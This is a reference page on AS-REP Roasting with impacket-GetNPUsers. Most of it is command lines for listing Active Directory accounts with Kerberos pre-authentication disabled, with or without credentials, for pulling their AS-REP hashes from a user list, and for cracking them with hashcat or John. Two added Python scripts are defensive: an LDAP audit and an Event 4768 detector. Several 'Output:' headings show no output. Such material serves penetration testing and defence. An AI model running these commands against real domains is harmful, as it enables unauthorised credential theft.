Overview

impacket-GetNPUsers performs AS-REP Roasting by targeting accounts that have Kerberos pre-authentication disabled (DONT_REQUIRE_PREAUTH). For such an account the KDC answers an AS-REQ without any proof of the password, and the encrypted part of the AS-REP is keyed with the user’s password-derived key (for RC4/etype 23 this is the NT hash), so it can be cracked offline.
impacket-GetNPUsers <DOMAIN>/<USER> [options]

With Valid Credentials

Enumerate all domain accounts with pre-auth disabled:

With Password

impacket-GetNPUsers domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

With NTLM Hash

impacket-GetNPUsers domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1
This queries LDAP for all accounts with UF_DONT_REQUIRE_PREAUTH. Add -request to actually fetch the AS-REP hashes — without it you only get the list of vulnerable accounts.
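The same LDAP query is what a defender should be running on a schedule. The script below is an added example (not impacket code and not from the original page): it asks the directory for every account with UF_DONT_REQUIRE_PREAUTH set, then orders the findings so enabled and adminCount=1 accounts come first. It assumes the ldap3 package is installed and that the bind account can read userAccountControl; the host, base DN and credentials are placeholders.

```python
"""Audit Active Directory for accounts with Kerberos pre-authentication disabled.

Added example, not part of impacket or the original page. It runs the same
LDAP query GetNPUsers uses, from the defender's side, so affected accounts can
be fixed before anyone roasts them.

Assumptions: ldap3 is installed; the bind account can read
userAccountControl; host, base DN and credentials below are placeholders.
"""
from __future__ import annotations

from dataclasses import dataclass

# userAccountControl bit for DONT_REQUIRE_PREAUTH (UF_DONT_REQUIRE_PREAUTH).
UF_DONT_REQUIRE_PREAUTH = 0x400000
# A roastable account that is still enabled is the urgent case.
UF_ACCOUNTDISABLE = 0x2

# LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803) makes the DC do the
# bitwise test server-side, so only matching accounts come back.
LDAP_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)


@dataclass
class Finding:
    sam_account_name: str
    enabled: bool
    admin_count: bool


def classify(entries):
    """Turn (sAMAccountName, userAccountControl, adminCount) tuples into findings.

    Only accounts whose UAC really has the pre-auth bit set are reported, so any
    directory dump can be passed in and the answer stays correct.
    """
    findings = []
    for sam, uac, admin_count in entries:
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        findings.append(Finding(
            sam_account_name=sam,
            enabled=not uac & UF_ACCOUNTDISABLE,
            admin_count=bool(admin_count),
        ))
    # Enabled and privileged accounts first: those are the ones to fix today.
    findings.sort(key=lambda f: (not f.enabled, not f.admin_count, f.sam_account_name))
    return findings


def query_dc(host, base_dn, user, password):
    """Fetch the raw tuples from a domain controller over LDAP (placeholder details)."""
    from ldap3 import ALL, Connection, Server  # assumption: ldap3 is installed

    server = Server(host, get_info=ALL)
    with Connection(server, user=user, password=password, auto_bind=True) as conn:
        conn.search(base_dn, LDAP_FILTER,
                    attributes=["sAMAccountName", "userAccountControl", "adminCount"])
        return [
            (str(e.sAMAccountName.value), int(e.userAccountControl.value),
             e.adminCount.value or 0)
            for e in conn.entries
        ]


if __name__ == "__main__":
    # Placeholder connection details; replace with your own.
    rows = query_dc("dc01.domain.local", "DC=domain,DC=local",
                    "DOMAIN\\audit_reader", "<password>")
    for f in classify(rows):
        state = "ENABLED" if f.enabled else "disabled"
        priv = " adminCount=1" if f.admin_count else ""
        print(f"{f.sam_account_name}: pre-auth disabled ({state}){priv}")
```

Each finding is an account to fix rather than to monitor: clear the flag (for example with the AD module's Set-ADAccountControl -DoesNotRequirePreAuth $false) and rotate the password, since any AS-REP already captured stays crackable offline.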

Without Credentials

When you have no valid domain credentials, supply a list of known or guessed usernames. No authentication is required because pre-auth is disabled for these accounts.
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1
Note the trailing / after the domain with no username.

Single User (No Credentials)

impacket-GetNPUsers domain.local/svc_backup -no-pass -dc-ip 10.10.10.1

Request AS-REP for Specific User

With credentials, request the AS-REP hashes (use -usersfile with a single name to narrow the target). GetNPUsers has no -request-user flag — the positional account is the authenticating user, not the target:
impacket-GetNPUsers domain.local/jdoe:'Password123' -request -dc-ip 10.10.10.1
Without credentials:
impacket-GetNPUsers domain.local/svc_backup -no-pass -dc-ip 10.10.10.1

Output Format

Hashcat Format (Default)

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat
Output:

John Format

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format john
Output:

Save to File

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt

Cracking with Hashcat

AS-REP hashes use hashcat mode 18200:
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Hash Mode   Description
18200       Kerberos 5 AS-REP etype 23 (RC4)

With Rules

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

With John the Ripper

john asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt

From User List File

Build a username list and spray for AS-REP Roastable accounts:
# users.txt — one username per line
# administrator
# svc_backup
# svc_sql
# krbtgt

impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt
Accounts with pre-auth enabled return KDC_ERR_PREAUTH_REQUIRED (not vulnerable). Accounts that don’t exist return KDC_ERR_C_PRINCIPAL_UNKNOWN. Only vulnerable accounts return a hash.
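Both behaviours described above leave a trace on the domain controller in Security Event ID 4768. The script below is an added example (not impacket code and not from the original page) showing the detection side: it flags a TGT issued with Pre-Authentication Type 0 over RC4 (0x17), which is what a successful AS-REP request against a roastable account looks like, and a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) failures from one client address, which is what a username list full of guesses produces. It assumes the events have already been parsed out of EVTX/XML into dicts keyed by the 4768 EventData field names; the sample events are constructed, not real telemetry.

```python
"""Detect AS-REP roasting in Windows Security Event ID 4768 records.

Added example, not part of impacket or the original page. Two detections:
  1. AS-REP issued with PreAuthType 0 (no pre-auth) and RC4 (0x17): the
     KDC just handed out offline-crackable material.
  2. Many KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) failures from one source in a
     short window: someone is testing a list of guessed usernames.

Assumption: events are dicts keyed by the 4768 EventData field names
(TargetUserName, IpAddress, PreAuthType, TicketEncryptionType, Status) plus
TimeCreated as ISO-8601. SAMPLE_EVENTS below is constructed, not real data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

PREAUTH_NONE = "0"            # Pre-Authentication Type 0: logon without pre-auth
ETYPE_RC4_HMAC = "0x17"       # Ticket Encryption Type 23, the hashcat 18200 case
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"
STATUS_OK = "0x0"

# Constructed sample: one normal logon, one AS-REP issued with no pre-auth
# over RC4, and a name-guessing burst from the same client address.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-05-01T09:00:01", "TargetUserName": "jdoe",
     "IpAddress": "::ffff:10.10.10.50", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TimeCreated": "2024-05-01T09:00:05", "TargetUserName": "svc_backup",
     "IpAddress": "::ffff:10.10.10.99", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
] + [
    {"TimeCreated": f"2024-05-01T09:00:{10 + i:02d}", "TargetUserName": name,
     "IpAddress": "::ffff:10.10.10.99", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x6"}
    for i, name in enumerate(["backupadm", "sqlsvc", "helpdesk", "it_admin", "printsvc"])
]


def roastable_tgt_events(events):
    """Return events where the KDC issued an AS-REP without pre-auth over RC4."""
    return [
        e for e in events
        if e["Status"] == STATUS_OK
        and e["PreAuthType"] == PREAUTH_NONE
        and e["TicketEncryptionType"].lower() == ETYPE_RC4_HMAC
    ]


def unknown_principal_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Return {client_ip: sorted guessed names} for every source that produced
    at least `threshold` unknown-principal failures inside one sliding window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"]))
    hits = {}
    for ip, rows in by_ip.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Slide the window start forward until it spans at most `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = sorted({name for _, name in rows})
                break
    return hits


if __name__ == "__main__":
    for e in roastable_tgt_events(SAMPLE_EVENTS):
        print(f"ALERT AS-REP without pre-auth (RC4) for {e['TargetUserName']} "
              f"from {e['IpAddress']}")
    for ip, names in unknown_principal_bursts(SAMPLE_EVENTS).items():
        print(f"ALERT username enumeration from {ip}: {len(names)} unknown principals {names}")
```

The first rule is high fidelity: a legitimate client for an account with pre-auth disabled still produces PreAuthType 0, but such accounts should not exist, so every hit is either an attacker or an account to remediate. The second rule needs a threshold tuned to the environment, since typos and stale service configurations also generate 0x6 failures.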

Kerberos Authentication

Use an existing TGT to enumerate without NTLM:
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetNPUsers domain.local/jdoe -k -no-pass -dc-host dc01.domain.local
When using -k, provide -dc-host with the FQDN instead of -dc-ip.

Quick Reference

# With credentials — list vulnerable accounts (no hashes)
impacket-GetNPUsers domain.local/jdoe:'Pass' -dc-ip 10.10.10.1

# With credentials — request the AS-REP hashes
impacket-GetNPUsers domain.local/jdoe:'Pass' -request -dc-ip 10.10.10.1

# Without credentials — test username list
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1

# Single user, no credentials
impacket-GetNPUsers domain.local/svc_backup -no-pass -dc-ip 10.10.10.1

# Save hashcat format
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt

# Save john format
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1 -format john -outputfile asrep.txt

# With NTLM hash
impacket-GetNPUsers domain.local/jdoe -hashes :NTHASH -dc-ip 10.10.10.1

# With Kerberos
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetNPUsers domain.local/jdoe -k -no-pass -dc-host dc01.domain.local

# Crack
hashcat -m 18200 asrep.txt rockyou.txt

Flag                    Description
-no-pass                Don’t require password (for unauthenticated requests)
-usersfile FILE         File with usernames to test (one per line)
-request                Request AS-REP hash (required for crackable output when authenticating; -usersfile runs request it directly)
-format hashcat|john    Output hash format (default: hashcat)
-outputfile FILE        Save hashes to file
-hashes LMHASH:NTHASH   Authenticate with NTLM hash
-aesKey KEY             Authenticate with AES key
-dc-ip IP               Domain controller IP address
-dc-host HOST           Domain controller hostname (for Kerberos auth)
-k                      Use Kerberos authentication